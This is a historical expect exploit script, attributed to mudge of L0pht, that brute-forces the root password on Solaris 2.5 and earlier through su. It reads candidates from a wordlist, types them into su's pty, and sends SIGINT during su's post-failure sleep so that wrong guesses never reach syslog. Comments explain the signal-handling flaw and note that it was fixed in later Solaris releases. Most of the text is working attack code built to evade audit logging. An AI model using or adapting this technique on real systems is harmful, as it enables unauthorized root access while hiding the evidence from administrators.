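#!/usr/local/bin/expect --
# A quick little sploit for a quick round of beers :)   mudge@L0pht.com
#
# This was something that had been floating around for some time.
# It might have been bitwrior that pointed out some of the oddities
# but I don't remember.
#
# It was mentioned to Casper Dik at some point and it was fixed in
# the next rev of Solaris (don't remember if the fix took place in
# 2.5.1 or 2.6 - I know it is in 2.6 at least).
#
# What happened was that the Solaris 2.5 and below systems
# had /bin/su written in the following fashion:
#
#        attempt to SU
#              |
#          successful
#           /      \
#          Y        N
#          |        |
#       exec cmd   sleep
#                   |
#                 syslog
#                   |
#                  exit
#
# There were a few problems here - not the least of which was that they
# did not bother to trap signals.  Thus, if you noticed su taking a while
# you most likely entered an incorrect password and were in the
# sleep phase.
#
# Sending a SIGINT by hitting ctrl-c would kill the process
# before the syslog of the invalid attempt occurred, so failed guesses
# left no audit trail.  The real defect is the ordering: the failure was
# logged *after* a signal-interruptible delay instead of before it.
#
# In current versions of /bin/su they DO trap (or block) signals and/or
# log before sleeping, so this script is of historical interest only.
#
# It should be noted that this is a fairly common coding problem that
# people will find in a lot of "security related" programs: any
# "penalise, then record" sequence is racy unless the process first
# makes itself unkillable by the user (block signals, or log first).
#
# .mudge
#
# Usage: sploit pwfile
#   pwfile - one candidate root password per line.  Candidates are typed
#            into su's pty, never passed on a command line, so they do not
#            show up in `ps`.
#
# Caveat: only the SIGINT-before-syslog path is silent.  A guess that
# times out or hits EOF without us getting a prompt may still be logged
# by su in the normal way.

# Exactly one argument: the password file.
if { $argc != 1 } {
    puts stderr "correct usage is : $argv0 pwfile"
    exit 1
}

# $argv is a list; take the first element rather than the list itself so a
# path containing whitespace still opens.  Read everything, then release
# the handle - the original never closed it.
set pwfile [open [lindex $argv 0] "r"]
set candidates [split [read $pwfile] "\n"]
close $pwfile

# Set the expect timeout once, up front.  The original set it *after* the
# first "Password:" expect, so the very first wait used the 10 s default.
# You might need to tweak this but 2 s should be ok on a local box.
set timeout 2

# Don't echo su's output to our stdout.
log_user 0

foreach line $candidates {
    # split leaves an empty trailing element after the file's final newline
    # (and blank lines are not useful guesses) - skip them.
    if { [string length $line] == 0 } {
        continue
    }

    spawn su root
    set id [exp_pid]

    # Wait for the prompt; on timeout/eof we fall through to the cleanup
    # below instead of blindly sending a password to nothing.
    set got_prompt 0
    expect {
        "Password:" { set got_prompt 1 }
        timeout     { }
        eof         { }
    }

    if { $got_prompt } {
        send "$line\n"
        # A root shell prompt means the guess was right.  "#" is a loose
        # pattern; tweak it if root's prompt differs.
        expect {
            "#" {
                puts "root password is $line\n"
                exit 0
            }
        }
    }

    # Wrong (or no) guess: su is now sitting in its pre-syslog sleep.
    # SIGINT kills it before the failed attempt is written to syslog -
    # that is the whole trick, and it only works where su does not trap
    # signals (Solaris <= 2.5).  Then close the pty and reap the child so
    # a long wordlist does not leave a pile of zombies behind.  Each step
    # is wrapped in catch because the child may already be gone (eof).
    catch { exec kill -INT $id }
    catch { close }
    catch { wait }
}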